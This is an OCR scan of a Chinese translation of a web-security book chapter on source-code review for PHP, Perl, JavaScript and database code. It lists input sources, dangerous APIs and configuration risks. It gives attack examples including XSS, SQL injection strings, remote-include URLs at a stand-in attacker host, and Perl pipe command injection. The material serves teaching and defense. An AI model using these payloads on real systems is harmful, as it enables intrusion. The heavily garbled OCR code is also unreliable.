$_GET 这 个 数组 包含 在 查询 字符 串 中 提交 的 参数 。 这 些 参数 根据 其 名 称 访 
SHTTP GET VARS 问 。 例 如 ， 在 下 面 的 URL 中 : 

















IN 
2 


wl 





https://wahh-app.com/search.php?query=foo 
查询 参数 的 值 使 用 以 下 代码 访问 : 


$_GET['query'l] 








s POST SHTTP POST VARS 这 个 数组 包含 在 请 求 主 体 中 提交 的 参数 
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( 续 ) 
变 量 措 述 
$_COOKIE S$HTTP COOKIE_ VARS 这 个 数组 包含 在 请 求 主体 中 提交 的 cookie 
$_REQUEST 这 个 数组 包含 $_GET、$_POST 与 $_COOKIE 数 组 中 的 所 有 数据 
$_FILES SHTTP_POST_FILES 这 个 数组 包含 在 请 求 中 上 传 的 文件 
$_SERVER[ 'REQUEST_ METHOD'] 包含 在 HTTP 请 求 中 使 用 的 方法 
s$_SERVER['QUERY_STRING ' ] 包含 在 请 求 中 提交 的 完整 查询 字符 串 
$_SERVER[ 'REQUEST_URI'] 包含 在 请 求 中 提交 的 完整 URL 
$_SERVER[ 'HTTP_ACCEPT'] 包含 HTTP Accept 消 息 头 的 内 容 
§_SERVER['HTTP ACCEPT CHARSET'] 包含 HTTP Accept-charset 消 息 头 的 内 容 
s_SERVER['HTTP ACCEPT ENCODING'] 包含 HTTP Accept-encodqing 消 息 头 的 内 容 
s_SERVER['HTTP ACCEPT LANGUAGE ' ] 包含 HTTP Accept-language 消 息 头 的 内 容 
s_SERVER[ ‘HTTP_ CONNECTION'] 包含 HTTP connection 消 息 头 的 内 容 
$_SERVER[ 'HTTP_HOST'] 包含 HTTP Host 消 息 头 的 内 容 
§_SERVER[ 'HTTP REFERER'] 包含 HTTP Referer 消 息 头 的 内 容 
s_SERVER['HTTP USER AGENT'] 包含 HTTP User-agent 消 息 头 的 内 容 
$_ SERVERI['PHE SELE'] 包含 当前 运行 脚本 的 名 称 。 虽 然 攻击 者 无 法 控制 脚本 名 称 ， 但 可 以 


在 这 个 名 称 后 附加 路 径 信 息 。 例 如 ， 如 果 一 个 脚本 包含 以 下 代码 : 
<form action="<?= S$_ SERVER['PHP_ SELF'] ?>"> 
那么 攻击 者 就 可 以 设计 诸如 下 面 的 跨 站 点 脚本 攻击 : 


/Search.php/"><script> 








当 尝 试 确定 PHP 应 用 程序 如 何 访问 用 户 提 交 的 输入 时 ， 应 该 记 住 以 下 反常 情况 。 

口 SGLOBALS 是 一 个 包含 在 脚本 全 局 范围 内 定义 的 所 有 变量 的 引用 的 数组 。 使 用 它 可 以 根据 
名 称 访问 其 他 变量 。 

口 如 果 配 置 指令 register g9lobals 被 激活 ， PHP 会 为 所 有 请 求 参 数 ( 即 s_REOUEST 数 组 
中 的 全 部 数据 ) 建立 全 局 变量 。 这 表示 ， 应 用 程序 可 通过 与 相关 参数 相同 的 名 称 引 用 一 

个 变量 ， 从 而 访问 用 户 输 入 。 如 采 应 用 程序 使 用 这 种 方法 访问 用 户 提 交 的 数据 ， 那 么 只 

和 仔细 地 逐 和 了 审查 代码 ， 才 能 确定 以 这 种 方式 使 用 的 变量 。 

口 除 前 面 提 到 的 标准 HTTP 消 息 头 外 , PHP 还 在 $_sERVER 数 组 中 增加 了 一 个 数据 , 用 于 处 理 
在 请 求 中 收 到 的 任何 定制 HTTP 消息 头 。 例 如 ， 提 交 消 息 头 : 


FooO: Bar 
生成 : 


$_SERVER['HTTP FOO'] = "Bar”" 
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口 名 称 包含 下 标 ( 方 括 号 内 ) 的 输入 参数 被 目 动 转换 为 数组 。 例 如 ， 请 求 下 面 的 URL : 
https:/ /wahh-app.com7 searcnh.Dhp?cuery[ 引 =fooxcduery[bp]=bat 
将 使 $S_GPT[I'auery'] 变 量 的 值 转换 成 一 个 包含 两 个 成 员 的 数组 。 如 采 一 个 数组 被 提交 给 
一 个 布 望 收 到 标量 值 的 图 效 ， 可 能 会 在 应 用 程序 中 出 现 无 法 预料 的 行为 。 











19.5.2 ”会话 交互 
PHP 使 用 s_sEssIOoN 数 组 保存 和 检索 用 户 会 话 中 的 信息 。 例 如 : 


$s SESSION['MyName'] = $ GET['uSername']; // store user's name 





echo "Welcome " .9 SESSIONI[ 'MyName']: // retrieve user's name 

$SHTTP_SESSION_VARS 数 组 的 用 法 与 上 面 的 数组 相同 。 

如 果 register_globals 被 激活 ( 见 19.5.4 方 ), 那么 全 局 变量 将 通过 以 下 方式 保存 在 当前 会 
话 中 : 

SsMyName = $$ GET['usSername'l]: 

Session register ("MyName"); 


19.5.3 ”潜在 危险 的 API 


这 一 节 介绍 一 些 常见 的 PHP API。 以 危险 的 方式 使 用 这 些 API 可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

PHP 中 包含 大 量 用 于 访问 文件 的 函数 , 其 中 许多 接受 可 用 于 访问 远程 文件 的 URL 和 其 他 结构 。 

下 面 的 函数 用 于 读 取 或 写 和 人 一 个 指定 文件 的 内 容 。 如 果 回 这 些 API 提 区 用 户 可 控制 的 数据 ， 
攻击 者 就 可 以 利用 这 些 API 访 问 服务 需 文 件 系统 上 的 任意 文件 。 

UD fopen 

DD readfile 

Dfile 











UD fpassthru 
UD gzopen 

UD gzfile 
ozpassthrna 
UD readgzfile 
DD copy 

UD rename 

UD rmdir 

DD mkdir 

DD unlink 

Lfile get contents 
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UD file put contents 

Dparse ini file 

下 面 的 也 数 用 于 包含 并 执行 一 个 指定 的 PHP 脚 本 。 如 采 攻 击 者 能 够 使 应 用 程序 执行 受 控 的 文 
件 ， 他 就 可 以 在 服务 硕 上 执行 任意 命令 。 


DD include 











UD include once 

UD require 

DD require once 

DD virtual 

请 注意 ， 即 使 无 法 包含 远程 文件 ,但 如 有 果 攻 击 者 可 向 服务 大 上 传 任意 文件 ， 他 仍然 能 够 执行 
任意 命令 。 

PHP 配 置 选项 allow_ur1l_fopen 可 用 于 防止 一 些 文件 函数 访问 远程 文件 。 但 是 ， 在 默认 情 
况 下 , 这 个 选项 设 为 1( 表示 允许 远程 文件 ); 因此 , 表 19-8 中 列 出 的 协议 可 用 于 检索 远程 文件 。 


表 19-8 可 用 于 检索 远程 文件 的 网 络 协议 





协议 示例 
HTTP, HTTPS http://wahh-attacker.com/bad.php 
FTP ftp://user:passwordQ@wahh-attacker.com/bad.php 


SE ssh2.shell://user:pass(Wwahh-attacker.com:22/xterm 
ssh2.exec://user:pass(Wwahh-attacker.com:22/cmd 


即使 a1low_url_fopen 设 为 0, 攻击 者 仍然 可 以 使 用 表 19-9 列 出 的 方法 访问 远程 文件 ( 取决 
于 所 安装 的 扩展 )。 


表 19-9 allow_url_fopen 设 为 0 时 仍然 可 用 于 访问 远程 文件 的 方法 


方 法 示 例 
SMB \wahh-attacker.com\bad.php 
PHP 输 入 /输出 流 php://filter/resource=http://wahh-attacker.com/bad.php 
压缩 流 compress.zlib://http://wahh-attacker.com/bad.php 
音频 流 ogg://http://wahh-attacker.com/bad.php 


注解 PHP 5.2 以 后 的 版 本 引入 了 一 个 新 的 选项 allow_url_include， 默 认 情 况 下 ， 


该 选项 被 禁用 。 这 个 默认 的 配置 防止 前 面 提 到 的 方法 在 调用 文件 包含 函数 时 用 于 指定 
一 个 远程 文件 。 





2. 数据 库 访问 
下 面 的 也 数 用 于 癌 数 据 库 发 送 一 个 查询 并 检查 查询 结 
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UD mysql query 
D mssqaql query 
Dpg_ query 





SQL 语 句 以 一 个 简单 的 字符 串 提 交 。 如 采用 户 可 控制 的 数据 属于 字符 串 参 数 的 一 部 分 ， 那么 





应 用 程序 就 可 能 容易 受到 SQL 注 入 攻击 。 例 如 : 


SuSsername = "admin' or 1=1-—",; 
Spassword = "foo",; 
SSAl="SELECT * FROM users WHERE username = 'Susername' 
AND password = 'Spassword'™",;} 
Ssresult = mysgql gquery (Ssgql, Slink) 
下 > 人 十 上 和 鳃 、 
已 会 执行 不 恨 查 询 : 
SELECT * FROM users WHERE username = :adqman or 1=1--' 
AND Password = 'foo!: 





下 面 的 函数 可 用 于 创建 预 处 理 语句 , 允许 应 用 程序 建立 一 个 包含 





以 可 徘 而 且 类 型 安全 的 方式 设 定 这 些 占 位 符 的 值 : 





D mysgqli->prepare 
DD stmt->prepare 

D stmt->bind param 
UD stmt->execute 


UD odbc prepare 





会 


E20 


数 占 位 符 的 SQL 查询 , 并 


如 果 按 照 正常 的 方式 使 用 ， 这 种 机 制 就 不 易 受 到 SQL 注 和 人 攻击。 例如 : 


Susername = "admin' or 1=1-——"; 
$spassword = "foo"; 
ssql = $db connection->prepare 


"SELECT * FROM users WHERE usSername = ? AND password = 2?"}); 


Sssql->bind param('"ss'", Susername, Spassword); 


Ssgql—->executel(); 
它 生 成 的 查询 等 同 于 : 


SELECT * FROM users WHERE USername = 








AND Password = 'foo!: 
3. 动态 代码 执行 
下 面 的 函数 可 用 于 动态 执行 PHP 代 码 : 
Deval 


Dcall user func 





call user func array 
Dcall user method 
call user method array 


DD create function 


'admin’: 


or 工 =- 一 
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分 写 分 隐 符 用 于 将 儿 个 语句 连接 在 一 起 。 如 末 向 这 些 函 数 提交 用 户 可 控制 的 数据 , 那么 应 用 
程序 可 能 易于 受到 脚本 注入 攻击 。 

搜索 与 奉 代 正则 表达 式 的 pzeg_replace 另 数 » 如 果 以 . e 选 项 调用 ， 可 用 于 运行 - 段 特 丈 的 
PHP 代 码 。 如 采用 户 可 控制 的 数据 出 现在 动态 执行 的 PHP 代 码 中 ， 应 用 程序 可 能 多 于 受到 攻击 。 

PHP 的 为 一 个 有 趣 的 特点 在 于 , 它 可 以 通过 一 个 包含 函数 名 称 的 变量 动态 调用 该 孙 数 ,例如 ， 
下 面 的 代码 将 调用 在 查询 学 符 串 func 参 数 中 指定 的 函数 : 

<?DPhp 


Svar=s GET['func']: 
ner} 





























这 时 , 用 户 可 以 通过 修改 func 参 数 的 值 , 使 应 用 程序 调用 任意 一 个 图 数 ( 没有 参数 ), 例如 ， 
调用 phpinfo 函 数 将 使 应 用 程序 输出 大 量 与 PHP 环 境 有 关 的 信息 ,包括 配置 选项 、 操 作 系 统 信息 
与 扩展 。 

4. OS 命令 执行 

下 面 这 些 另 数 可 用 于 执行 操作 系统 命令 : 


DD exec 




















D passthru 

popen 

UD proc_open 

DD shell exec 

DD system 

口 有 反 单 引号 (、) 

所 有 这 些 命令 都 可 以 使 用 | 字符 链接 在 一 起 。 如 宁 未 经 过 滤 就 问 这 些 函 数 提交 用 户 可 控制 的 
数据 ， 那 么 攻击 者 就 可 以 在 应 用 程序 中 执行 任意 命令 。 

5. URL 重 定向 

下 面 的 API 用 于 在 PHP 中 发 布 一 个 HITP 重 定 问 : 49 

UD http redirect 

UD header 








DQ HttpMessage: :setResponseCode 

D HttpMessage: :setHeaders 

通常 , 使 用 http_reqirect 力 数 可 以 实现 一 个 重 定 回 , 该 图 数 接受 一 个 包含 相对 或 绝对 URL 
的 学 符 串 。 如 果 这 个 字符 串 的 值 由 用 户 控制 ， 那 么 应 用 程序 可 能 多 于 受到 钓鱼 攻击 。 

通过 调用 包含 适当 Location 消 息 涉 的 header 捕 数 也 可 以 实现 重 定 癌 ， 它 让 PHP 得 出 结论 ， 
认为 需要 一 个 HTTP 重 定向 。 例 如 : 

header ("Location: /target.php'); 


还 应 仔细 审查 setResponseCode 与 setHeaders API 的 用 法 ,如 果 某 个 重 定 问 包含 一 个 含有 
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HTTP Location 消息 头 的 3xx 响 应 ， 应 用 程序 就 可 能 使 用 这 些 API 执 行 重 定向 。 

6. 套 接 字 

下 面 的 API 用 于 在 PHP 中 建立 和 使 用 网 络 套 接 字 : 

UD socket create 

DUD socket connect 

UD socket write 

UD socket send 

UD socket recyv 

DD fsockopen 

UD pfsockopen 

使 用 socket_create 创 建 一 个 套 接 字 后 ， 青 通过 调用 socket_connect 与 远程 主机 建立 连 
接 ; 这 个 API 接 受 目标 主机 的 卫 与 端口 信息 为 参数 。 如 采用 户 能 够 以 采种 方式 控制 这 些 主机 信息 ， 
攻击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 ， 无论 这 些 主机 位 于 公共 因特网 上 、 私 有 
DMZ 中 还 是 应 用 程序 运行 的 内 部 网 络 。 

fsockopen 与 pfsockopen 国 数 可 用 于 打开 连接 指定 主机 与 端口 的 套 接 字 ， 并 返回 一 个 可 用 
在 fwrite 和 fgets 等 标准 文件 函数 中 的 文件 指针 。 如 采 问 这 些 孔 数 提交 用 户 数 据 ， 应 用 程序 就 
可 能 易于 受到 攻击 ， 如 前 文 所 述 。 





























19.5.4 配置 PHP 环境 


PHP 配 置 选 项 在 php.ini 文 件 中 指定 , 该 文件 使 用 与 Windows INI 文 件 相 同 的 结构 。 有 各 种 选项 
都 会 影响 一 个 应 用 程序 的 安全 。 最 新 版 的 PHP 删 除了 许多 以 前 引起 问题 的 选项 。 

1. 使 用 全 局 变量 注册 

如 果 register_globals 指 令 被 激活 ，PHP 会 为 所 有 请 求 参 数 建立 全 局 变量 。 如 果 PHP 不 要 
求 变 量 在 使 用 前 被 初始 化 , 这 个 选项 就 会 导致 安全 漏洞 , 使 攻击 者 能 够 将 一 个 变量 初始 化 为 任意 
一 个 值 。 

例如 , 下面 的 代码 检查 一 名 用 户 的 证 书 , 如 果 证 书 有 效 , 就 将 Sauthenticated 变 量 值 设 为 1: 


if {check credentials(susername, Spassword):} 


{ 

















sauthenticated = 1:; 
} 


jf {Sauthenticated,) 
{ 


为 最 初 PHP 没 有 将 Sauthenticatedq 变 量 明 确 地 初始 化 为 0， 攻 击 者 就 可 以 通过 提交 请 求 
参数 authent icated=1 避 开 登 录 。 这 使 PHP 在 进行 证 书 检查 人 之 用 就 将 全 局 变量 Sauthenticated 
设 为 1。 
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注解 ”从 PHP 4.2.0 开 始 ，register_globals 指 令 上 默认 被 禁用 。 然 而 ， 由 于 许多 老式 
应 用 程序 依赖 于 register_globals 执 行 的 正常 操作 ， 因 此 ， 通 常 php.ini 会 明确 激 


活该 指令 。PHP 6 完全 删除 了 register_globals 指 令 。 





2. 安全 模式 
如 果 safe_mode 指 令 被 激活 ,那么 PHP 会 对 使 用 某 些 危险 的 函数 施加 限制 。 一 些 函 数 被 完全 
禁用 ， 其 他 一 些 函 数 的 使 用 也 受到 限制 ， 如 下 所 示 。 

口 shell_exec 哨 数 被 禁用 ， 因 为 这 个 函数 可 用 于 执行 操作 系统 命令 。 

加 mail 池 数 的 additional parameters 参 数 被 禁用 ， 因 此 ， 如 果 以 不 安全 的 方式 使 用 这 
个 参数 ， 可 能 导致 SMTP 注 入 漏洞 〈 请 参阅 第 10 章 了 解 相关 内 容 )。 

D exec 氢 数 仪 能 够 执行 safe_mode_exec_dir 指 定 上 日 标 下 的 可 执行 程序 ， 命令 字符 串 中 的 
元 字符 被 目 动 转 义 。 


注解 ”并非 所 有 的 危险 函数 都 受到 安全 模式 的 限制 ， 一 些 限制 受到 其 他 配置 选项 的 影 











响 。 而 且 ， 有 各 种 方法 可 以 避 开 一 些 安全 模式 限制 。 安 全 模式 并 不 能 完全 解决 PHP 应 
用 程序 中 的 安全 问题 。PHP 6 已 删除 安全 模式 。 





3. Magic quotes 

如 果 激 活 magic_quotes_gpc 指 令 , 那么 请 求 参 数 中 包含 的 任何 单 引 号 、 双 引号 、 反 斜 线 和 
空 字符 邦人 会 用 一 个 反 斜 线 日 动 转 义 。 如 果 magic_quotes_sybase 指 令 被 禁用， 那么 PHP 就 会 用 
一 个 单 引 号 转 义 所 有 单 引 号 。 这 个 选项 冒 在 保护 包含 不 安全 的 数据 库 调 用 的 危险 代码 ,以 防 它 被 
恶意 的 用 户 输 入 利用 。 在 应 用 程序 的 代码 中 查找 SQL 注 入 漏洞 时 ， 应 该 检查 magic quotes 是 否 被 
激活 ， 因 为 它 会 影响 应 用 程序 处 理 输 入 的 方式 。 

使 用 magic quotes 并 不 能 防止 所 有 SQL 注入 攻击 。 如 第 9 章 所 述 ， 注 入 一 个 数字 字段 的 攻击 并 
不 需要 使 用 单 引 号 。 而 且 ， 如 果 其 中 包含 的 引号 没有 被 转 义 的 数据 随后 又 从 数据 库 中 读 回 ,那么 
仍 可 以 利用 这 些 数据 实施 二 阶 攻击 。 

在 不 需要 任何 转 义 的 情况 下 处 理 数据 时 ,激活 magic quotes 选 项 可 能 会 使 PHP 对 用 户 输入 进行 
不 必要 的 修改 ， 导 人 致 代码 中 多 出 和 斜 线 ， 还 要 使 用 stripslashes 函数 删除 。 

在 必要 时 ， 一些 应 用 程序 通过 addslashes 涵 数 提 交 和 参数， 自行 对 相关 输入 进行 转 义 。 如 果 
PHP 配 置 激 活 了 magic quotes, 那么 这 种 方法 就 会 导致 双重 转 义 字符 , 这 时 就 会 将 配对 的 斜 线 解释 
为 字面 量 反 斜 线 ， 洲 在 恶意 字符 不 会 转 义 。 

由 于 magic quotes 选 项 的 局 限 性 与 不 规则 性 , 建议 禁用 该 选项 , 使 用 预 处 理 语句 安全 访问 数据 库 。 


























注解 ”PHP 6 已 删除 magic quotes 选 项 。 





4. 其 他 
表 19-10 列 出 了 其 他 一 些 可 能 影响 PHP 应 用 程序 安全 的 配置 选项 。 





542 第 19 章 


选 项 
allow url fopen 


allow url include 
display_errors 
file uploads 


uploagd tmp_qdir 
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表 19-10 ”其 他 PHP 配 置 选项 
描 述 
如 末 荣 用 ， 该 指令 阻止 一 些 文件 函数 访问 远程 文件 ( 如 前 文 所 述 ) 
如 琳 荣 用 ， 该 指令 阻止 PHP 文 件 包含 函数 用 于 包含 一 个 远程 文件 


如 果 禁 用 , 该 指令 阻止 PHP 向 用 户 浏 览 需 发 送 错误 消息 。1og_errors 与 error_1og 选 项 
可 在 服务 硕 上 记录 错误 消息 ， 以 方便 诊断 错误 


如 采 激 活 ， 该 指令 将 导致 PHP 允 许 通 过 HTTP 上 传 文件 


这 个 指令 可 用 于 指定 保存 上 传 的 文件 的 临时 目录 。 该 指令 确保 不 会 将 敏感 文件 保存 在 任何 
用 户 都 可 访问 的 位 置 








本 节 主 要 介绍 在 Perl 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 话 交 互 的 方式 、 存 在 的 潜 
在 危险 的 API 以 及 与 平台 安全 相关 的 配置 选项 
众所周知 ，Perl 语 言 言 允 许 开发 者 以 各 种 方式 执 和 了 相同 的 任务 。 而 且 ， 有 大 量 Perl 模 块 可 满足 
不 同 的 需求 。 如 果 Perl 使 用 任何 不 常见 的 或 所 有 权 模 块 ， 应 对 这 些 模块 进行 仔细 审查 ， 确 定 它 们 
是 否 使 用 了 任何 强大 的 或 危险 的 函数 ， 从 而 引入 应 用 程序 直接 使 用 这 些 函 数 时 引入 的 相同 漏洞 。 




















CGIpm 均 证 最 向 用 于 包 建 Web 应 用 程序 的 Perl 模 块 , 当 对 用 Perl 编 号 的 Web 应 用 程序 进行 代码 审 
查 时 ,很 可 能 遇 到 这 个 模块 所 使 用 的 API。 


19.6.1 确定 用 户 提 交 的 数据 
表 19-11 列 出 了 CGI 查询 对 象 的 全 部 成 员 。 


选 项 


param 
param fetch 


Vars 


Cookie 


raw_ Cookie 


self url 


url 


query_string 
referer 


request_method 


表 19-11 用 于 获取 用 户 提交 的 数据 的 CGI 查询 成 员 
描 述 
如 果 调 用 时 不 使 用 参数 ，param 返 回 请 求 中 所 有 参数 名 称 的 列表 
如 果 调 用 时 使 用 参数 名 称 ，param 返 回 该 请 求 参 数 的 值 
param_fetch 方 法 返回 一 个 命名 参数 数组 
它 返回 参数 名 称 与 值 之 间 的 散 列 映射 
使 用 cookie 函 数 可 设 定 和 检索 一 个 命名 cookie 的 值 
raw_cookie 子 数 返回 HTTP cookie 消 息 头 的 全 部 内 容 ， 但 不 进行 任何 解析 


些 男 数 返回 当前 URL， 前 者 包含 所 有 查询 字符 串 











返回 当前 请 求 的 查询 字符 串 
返回 HTTP Referer 消 息 头 的 值 


这 个 函数 
这 个 函数 
这 个 函数 


返回 请 求 中 使 用 的 HTTP 方 法 
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( 续 ) 
选 项 描 述 
user_agent 这 个 函数 返回 HTTP User_agent 消 息 头 的 值 
J 这 些 函 数 返回 当前 请 求 中 的 所 有 HTTP 环 境 变量 列表 
9 
ReadParse 这 个 琢 数 返回 一 个 名 为 simn 的 数组 ， 其 中 包含 所 有 请 求 参数 的 名 称 与 值 


19.6.2 ”会话 交互 
Perl 模 块 CGISession .pm 对 模块 cGI.pm 进 行 扩展 ， 为 会 话 追 踪 与 数据 存储 提供 文 持 。 例 如 : 


Sq—->sSsession datal(l"MyName"-=->param("username")); // Store user's name 





Print "Welcome " . Sgq->session data('"'MyName"); // retrieve user's name 


19.6.3 ”潜在 危险 的 API 


这 一 市 介绍 一 些 党 见 的 Perl API。 以 危险 的 方式 使 用 这 些 API 可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

Perl 使 用 下 面 的 API 访 问 文件 : 

DD open 

DD sysopen 

open 国 数 用 于 恋 取 或 写 入 指定 文件 的 内 容 。 如 采 以 文件 名 参数 提交 用 户 可 控制 的 数据 ， 攻 
击 者 就 可 以 访问 服务 如 文 件 系 统 上 的 任意 文件 。 

另外 ,如 果 文 件 名 参数 的 开头 或 结尾 为 管 所 得 | ), 那么 这 个 参数 的 内 容 被 提交 给 一 个 shell 
命令 。 如 果 攻 击 者 能 够 注入 包含 管道 符 或 分 写 之 类 的 shell 元 字符 的 数据 ,那么 他 们 就 可 以 执行 任 
意 命 令 。 例 如 ， 在 下 面 的 代码 中 ， 攻 击 者 可 以 注 和 人 suseragddr 参 数 ， 以 执行 系统 命令 : 


suseraddr = Sgquery->param("useraddr").; 
open (MAIL, | :usr/bin/sendmail Suseraddr'"}): 
print MAIL "To: SuSeraddr\n"; 











2. 数据 库 访 问 
selectall_arrayref 限 数 用 于 癌 数 据 库 发 送 一 个 查询 ,并 以 一 系列 数组 的 形式 检索 查询 结 
果 。qo 函 数 用 于 执行 一 个 查询 ， 并 返回 受 影响 的 行 的 数量 。 在 这 两 个 图 数 中 ，SQL 语 句 以 一 个 简 
单 的 字符 串 提 区。 
如 果 用 户 可 控制 的 数据 属于 字符 串 参 数 的 一 部 分 , 那么 应 用 程序 就 可 能 容易 受到 SQL 注 入 攻 








击 。 例 如 : 
my Susername = "admin' or 1=1-—"; 
my Spassword = "foo"; 
my SSql="SELECT * FROM users WHERE username = 'S$Susername' AND password = 
' SpAasSsworQ' "} 


my Sresult = $db connection->selectall arrayref (ssql) 
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> 人 人 /一 、 
已 会 执行 不 良 查 询 : 
SELECT * FROM users WHERE username = 'admin’' or 1=1--—! 
AND password = :foao: 





prepatre 与 execute 国 数 可 用 于 创建 预 处 理 语句 ,允许 应 用 程序 建立 一 个 包含 参数 占 位 符 的 
SQL 查询 ,并 以 可 徘 而 且 关 型 安全 的 方式 说 定 这 些 占 位 待 的 值 。 如 朱 按 正 笛 的 方式 使 用 ， 这 种 机 
制 就 不 易 受 到 SQL 注入 攻击 。 例 如: 


my Susername 














"admin’' or 1=1-——",; 


"foo”™: 


my Spassword 
my SSsql = Sdb_ connection->prepare ("SELECT * FROM users 
WHERE USername = ? AND password = 7?");: 


Ssql->executel(Susername, Spassword); 








它 生 成 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = 'admin’'’' or 1=1--: 
AND Password = 'foo!: 


3. 动态 代码 执行 

eval 可 用 于 动态 执行 包含 Perl 代 码 的 字符 串 。 分 号 分 阳 符 用 于 将 儿 个 语句 连接 在 一 起 。 如 果 
癌 这 个 函数 提交 用 户 可 控制 的 数据 ， 那 么 应 用 程序 可 能 易于 受到 脚本 注入 攻击 。 

4. OS 命令 执行 

下 面 这 些 函数 可 用 于 执行 操作 系统 命令 : 

DD system 














UD exec 

Dax 

口 反 单 引号 (、) 

所 有 这 些 命令 都 可 以 使 用 | 字符 链接 在 一 起 。 如 果 未 经 过 滤 就 回 这 些 函 数 提交 用 户 可 控制 的 
数据 ， 攻 击 者 就 可 以 在 应 用 程序 中 执行 任意 命令 。 

5. URL 重 定向 

CGI 查 询 对 象 成 员 之 一 的 redirect 拯 数 接受 一 个 包含 相对 或 绝对 URL 的 字符 串 ; 用 户 被 重 
定 问 到 该 URL。 如 果 这 个 字符 串 的 值 由 用 户 控 制 ， 那 么 应 用 程序 可 能 多 于 受到 钓鱼 攻击 。 

6. 套 接 字 

使 用 socket 创 建 一 个 套 接 字 后 ， 再 通过 调用 connect 在 它 与 远程 主机 之 间 建 立 连 接 ， 
connect 限 数 接受 由 目标 主机 的 人 P 与 问 口 信息 组 成 的 sockaddr_in 绪 构 。 如 果 用 户 能 够 以 某 种 方 
式 控制 这 些 主机 信息 , 攻击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 , 无 论 这 些 主机 位 于 
因特网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 
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Perl 提 供 一 个 污染 模式 , 防止 用 户 提 交 的 输入 被 传送 给 潜在 危险 的 函数 。 通 过 以 下 方式 向 Perl 
解释 各 提交 -T 标 记 ， 可 在 污染 模式 下 执行 Perl 程 序 。 
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#1/usr/bin/perl -TI 

当 某 个 程序 在 污染 模式 下 运行 时 , 解释 需 会 追踪 该 程序 以 外 提交 的 每 一 个 输入 , 并 把 它 当 做 
锌 污染 的 输入 人 处理 。 如 末 为 一 个 变量 根据 一 个 受 污 染 的 数据 分 配 它 的 值 ， 那 么 Perl 也 认为 它 受 到 
污染 。 例 如 : 

spath = "/home/pubs" # Spath is not tainted 

sfilename = param( "file").; # Sfilename 1is from regquest parameter and 








# is tainted 
Ssfull path = Spath.sfilename; # sfull path now tainted 


不 能 将 污染 的 变量 提交 给 一 系列 功能 强大 的 命令 ， 包 括 eval 、system、exec 与 open。 要 
在 敏感 操作 中 使 用 污染 的 数据 ， 就 必须 执行 一 项 模式 匹配 操作 并 提取 匹配 的 子 字 符 串 ,， “清洁 ” 
这 些 数据 。 例 如 : 


sfull path =~ m/^([a-zA-21-9]+)8/; 








# match alphanumeric submatch 
# in Ssfull path 
## 
# 


sclean full path = $1; set Sclean full path to the 


first submatch 


# sclean full path is untainted 
里 然 污 染 模 式 机 制 则 在 防止 许多 类 型 的 源 洞 , 但 只 有 当 开 发 者 使 用 适当 的 正则 表达 式 从 被 污 
染 的 输入 中 提取 “ 消 洁 ” 的 数据 时 它 才 会 有 效 。 如 来 一 个 表达 式 的 范围 过 于 冤 沁 ,并 提取 了 使 用 
时 可 能 引起 问题 的 数据 ,那么 污染 模式 提供 的 保护 就 会 失效 ， 应 用 程序 仍然 易于 受到 攻击 。 实 际 
上 ,污染 模式 被 当做 一 种 提醒 机 制 ， 它 告诉 程序 员 在 危险 操作 中 使 用 输入 的 数据 前 ， 必 须 对 所 有 
输入 进行 适当 确认 。 它 不 能 保证 所 实施 的 输入 确认 已 经 足够 全 面 。 








19.7 JavaScript 


由 于 客户 端 JavaScript 不 需要 任何 应 用 程序 访问 权限 即 可 访问 , 因此 , 任何 时 候 都 可 以 执行 以 
安全 为 中 心 的 代码 审查 。 这 类 审查 的 关键 在 于 确定 客户 端 组 件 中 的 所 有 汤 洞 ,如 基于 DOM 的 XSS， 
它们 使 用 户 易 于 受到 攻击 ( 请 参阅 第 12 草 了 解 相 关内 容 )。 审 查 JavaScript 的 另 一 个 原因 是 ， 这 样 
做 有 助 于 了 解 客户 端 实施 了 哪些 输入 确认 ， 以 及 动态 生成 的 用 户 界 面 的 结构 。 

当 审 查 JavaScript 代码 时 ， 必 须 确保 检查 .js 文件 和 在 HTML 内 容 中 极 入 的 脚本 。 

需要 重点 审查 的 是 那些 读 取 基于 DOM 的 数据 以 及 写 和 人 或 以 其 他 方式 修改 当前 文档 的 API, 如 
表 19-12 所 示 。 




















表 19-12” 读 取 基 于 DOM 数 据 的 JavaScript API 








API 描 述 
ee :location 这 些 API 可 用 于 访问 通过 专门 设计 的 URL 控 制 的 DOM 数 据 ， 因 而 攻击 者 
t .URL > 二 y » VIA > 、 
ee 可 向 它们 提交 专门 设计 的 数据 ， 攻 击 其 他 应 用 程序 用 户 


document .referer 
window.location 
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( 续 ) 
API 描 述 
a 这 些 API 可 用 于 更 新 文档 的 内 容 并 动态 执行 JavaSeript 代 码 。 如 果 向 这 些 
document .body .innerHtml API 提 交 攻 击 者 可 控制 的 数据 ， 他 就 可 以 在 受害 者 的 浏览 带 中 执行 任意 
人 JavaScript 代 码 


window.execScript() 
window.setInterval ( ) 
window.setTimeout() 


19.8 ”数据 库 代 码 组 件 


如 今 , Web 应 用 程序 已 不 仅仅 使 用 数据 库 实 现 数据 人 存储。 今天 的 数据 库 包 含 丰 富 的 编程 接口 ， 
可 在 数据 库 层 执行 大 量 的 业务 逻辑 。 开 发 者 频 索 使 用 数据 库 代 码 组件 〈《 如 存储 过 程 、 触 发 融和 用 
户 定 义 的 函数 ) 完成 各 种 关键 任务 。 因 此 ， 当 审查 一 个 Web 应 用 程序 的 源 代 码 时 ， 必 须 将 数据 库 
中 执行 的 所 有 逻辑 包括 在 审查 范围 之 内 。 

数据 库 代 码 组 件 中 的 编程 错误 可 能 会 导致 本 章 描 述 的 各 种 安全 漏洞 。 但 现实 操作 中 应 当 留 意 
两 种 主要 的 漏洞 。 首 匈 ， 数 据 库 组 件 日 身 可 能 包含 SQL 注入 漏洞 ; 其 次 ,用户 输入 可 能 会 以 危险 
的 方式 提交 给 次 在 危险 的 函数 。 























19.8.1 SQL 注 入 


第 9 董 介 绍 了 如 何 使 用 预 处 理 语句 代 蔡 动态 SQL 语 句 ， 以 防止 SQL 注 入 攻击 。 人 然而， 即使 在 
整个 Web 应 用 程序 代码 中 正确 使 用 预 处 理 语句 ， 如 果 数 据 库 代码 组 件 以 危险 的 方式 使 用 用 户 提 交 
的 输入 构造 查询 ，SQL 注 入 漏洞 也 依然 存在 。 

